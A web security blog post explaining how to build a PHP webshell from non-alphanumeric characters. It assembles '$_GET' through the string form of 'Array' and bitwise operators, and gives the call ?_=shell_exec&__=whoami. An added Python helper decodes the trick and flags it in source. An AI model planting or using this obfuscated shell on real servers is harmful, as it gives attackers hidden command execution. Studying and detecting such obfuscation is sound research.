    The Spanner
    Web security blog

    Made by Gareth Heyes
    Follow me on Twitter: @garethheyes

    Non alphanumeric code in PHP

    By Gareth Heyes (@hackvertor)

    Published 14 years 8 months ago • Last updated March 22, 2025


    So a small PHP shell was tweeted around, and it inspired me to investigate a way to execute non-alphanumeric code. First off I started with the idea of using octal escapes in PHP and constructing the escape: for example, \107 is "G", so if I could construct the "107" and add the backslash to the beginning, maybe I could construct "G". It worked like this:

    $_=+"";                                    // +"" is 0
    $_=(++$_)+(++$_)+(++$_)+(++$_);            // 1+2+3+4 = 10
    $__=+"";                                   // 0
    $__++;                                     // 1
    $___=$_*$_+$__+$__+$__+$__+$__+$__+$__;    // 10*10+7 = 107
    $___="\\$___";                             // the literal text "\107", a string the engine never re-parses as an escape

    But there was no way to evaluate the escape once it was constructed without using alphanumeric chars. So I was stumped. Then I had a brain wave: PHP automatically does a string conversion for arrays and turns them into "Array" when they are accessed as a string. I had "A", "r", "r" etc., but I really needed "GET" in order to create a nice small non-alpha shell.

    On to the second technique: PHP allows you to use bitwise operators on strings :D

    'a'|'b'; // 'c'!

    We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later, I had combined the characters to create "GET" and thus make our small non-alphanumeric PHP shell :D

    <?
    $_="";
    $_[+""]='';          // writing to offset 0 of an empty string turns $_ into an array (PHP 5 behaviour)
    $_="$_"."";          // an array used as a string becomes "Array"
    // "\x06", "\x05" and "\x15" stand for the raw control bytes of the real payload,
    // which keep the source free of alphanumerics; "A"|6 = "G", "A"|5 = "E", "A"^21 = "T"
    $_=($_[+""]|"\x06").($_[+""]|"\x05").($_[+""]^"\x15");
    // $_ is now "GET", so ${'_'.$_} below is $_GET
    ?>
    <?=${'_'.$_}['_'](${'_'.$_}['__']);?>

    The first part converts the string into an array by attempting to assign to position "0" of the string. Then I make sure the array is a string. Then I use the "A" from "Array" with bitwise operators to construct "G", "E" and "T" via "A"|0x6, "A"|0x5 and "A"^0x15. There you have it; you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.
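    As an added example (my own analysis helper, not code from the post), the Python script below emulates PHP's byte-wise string operators, including their length rules, and decodes the three terms above to "GET" without running any PHP; it assumes the quoted control characters stand for the raw bytes 0x06, 0x05 and 0x15, shows why a literal "0x06" string would give "qx06" rather than "G", and adds a crude triage check for this pattern in PHP source.

```python
import re

# Added analysis helper, not code from the original post: emulate PHP's
# byte-wise string operators to decode what an obfuscated expression such as
# ("A"|"\x06").("A"|"\x05").("A"^"\x15") builds, without executing it.

def php_str_bitop(a: bytes, b: bytes, op: str) -> bytes:
    """Apply PHP's |, & or ^ to two strings byte by byte. For '|' the result
    keeps the longer operand's tail; '&' and '^' truncate to the shorter."""
    if op == "|":
        short, long_ = sorted((a, b), key=len)
        return bytes(x | y for x, y in zip(a, b)) + long_[len(short):]
    if op == "&":
        return bytes(x & y for x, y in zip(a, b))
    if op == "^":
        return bytes(x ^ y for x, y in zip(a, b))
    raise ValueError(f"unsupported operator {op!r}")

# PHP 5 renders an array as the string "Array" when it is used as a string,
# so $_[0] on the converted value is "A", the only letter the payload needs.
ARRAY_STRING = b"Array"

def decode_array_trick(terms):
    """Rebuild the string assembled from "Array"[index]; terms are
    (index, operator, mask) tuples, one per ($_[index] op "mask") piece."""
    out = b""
    for index, op, mask in terms:
        out += php_str_bitop(ARRAY_STRING[index:index + 1], mask, op)
    return out.decode("latin-1")

def explain_term(index, op, mask):
    """Readable report line, e.g. "A | 0x06 -> 'G'"."""
    src = ARRAY_STRING[index:index + 1]
    res = php_str_bitop(src, mask, op)
    return f"{src.decode()} {op} 0x{mask.hex()} -> {res.decode('latin-1')!r}"

def has_control_byte_bitop(source: bytes) -> bool:
    """Triage check: a string bitwise operator applied to a quoted control
    byte (other than tab/LF/CR) is a strong hint of this obfuscation."""
    return re.search(rb'[|&^]\s*"[\x01-\x08\x0b\x0c\x0e-\x1f]', source) is not None

# The three terms of the post's shell, with the raw bytes the control
# characters stand for (constructed from the post, not captured traffic).
POST_TERMS = [(0, "|", b"\x06"), (0, "|", b"\x05"), (0, "^", b"\x15")]

if __name__ == "__main__":
    for term in POST_TERMS:
        print(explain_term(*term))
    print("builds:", decode_array_trick(POST_TERMS))
```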

    To call the shell you'd use: ?_=shell_exec&__=whoami

    Don't forget: if you ever encounter this in the wild, use RIPS to analyze the PHP code.
